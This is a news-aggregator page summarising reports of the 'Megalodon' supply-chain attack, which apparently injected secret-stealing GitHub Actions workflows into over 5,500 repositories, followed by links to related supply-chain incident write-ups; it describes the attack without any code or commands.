All Topics
All Topics
Technology
Technology
Design
Design
Programming
Programming
Science
Science
News
News
Gaming
Gaming
Entertainment
Entertainment
Business
Business
Finance
Finance
Sports
Sports
Health
Health
Food
Food
Travel
Travel
Art
Art
Music
Music
Books
Books
Education
Education
Politics
Politics
Personal
Personal
No algorithm. No AI slop. No ads. Just RSS. Pro-human. Indie writers. Real journalism. Open web. Chronological. Hand toasted.

Megalodon Attack: Malicious GitHub Actions Workflows Compromise Over 5,500 Open-Source Repositories

19h ago· 4 min readenNews
Bagel score 80 of 100
80/100
Golden Brown
Bagelometer

Pulled from the oven just right. Trustworthy, fact-dense, deeply satisfying.

Score80TypenewsSentimentvery negative

Summary

A large-scale supply chain attack campaign tracked as "Megalodon" injected malicious GitHub Actions workflows into over 5,500 open-source repositories within a six-hour window on May 18, 2026. The attack targeted repositories with weak branch protection, pushing backdoored CI workflow files designed to steal secrets from every subsequent pipeline run, including cloud credentials, SSH keys, API tokens, and GitHub Actions OIDC tokens. The attacker never touched application code, only CI/CD pipelines, making detection difficult for most affected repositories.

Key quotes

· 3 pulled
A forged commit. A workflow file disguised as a routine CI optimization. Within 6 hours, 5,561 GitHub repositories were backdoored.
Cloud credentials harvested. SSH keys stolen. OIDC tokens minted and exfiltrated before any runner finished.
The attacker never touched your application code, only your pipeline. Most repositories had no idea it happened.
Snippet from the RSS feed
A forged commit. A workflow file disguised as a routine CI optimization. Within 6 hours, 5,561 GitHub repositories were backdoored. Cloud credentials harvested. SSH keys stolen. OIDC tokens minted and exfiltrated before any runner finished. The attacker n

You might also wanna read

GitHub Actions workflows identified as common weak link in open source supply chain attacks

This article analyzes a series of high-profile open source supply chain security incidents from the past 18 months, tracing them back to Git

Andrew Nesbitt·1mo ago

Post-mortem Analysis of @ctrl/tinycolor npm Supply Chain Attack via GitHub Actions

A detailed post-mortem analysis of a supply chain attack on the @ctrl/tinycolor npm package. The attack occurred when a malicious GitHub Act

sigh.dev·8mo ago

Trivy GitHub Actions Compromised in Supply Chain Attack, Exposing CI/CD Secrets

A new supply chain attack targeting Trivy's GitHub Actions has been disclosed, where attackers compromised the security scanner by force-upd

socket.dev·2mo ago

Glassworm Threat Actor Returns with Unicode-Based Supply Chain Attacks on GitHub, npm, and VS Code

The Glassworm threat actor has returned with a new wave of supply chain attacks using invisible Unicode characters to compromise software re

aikido.dev·2mo ago

Supply Chain Attacks on Open-Source Software: Case Study of Malicious Pull Request Attempts

The article discusses recent supply chain attacks on open-source software projects like LiteLLM and axios, with a specific case study of att

casco.com·1mo ago

Postmortem: TanStack npm supply-chain compromise via GitHub Actions exploitation

On May 11, 2026, an attacker exploited a chain of vulnerabilities — including the pull_request_target "Pwn Request" pattern, GitHub Actions

tanstack.com·25d ago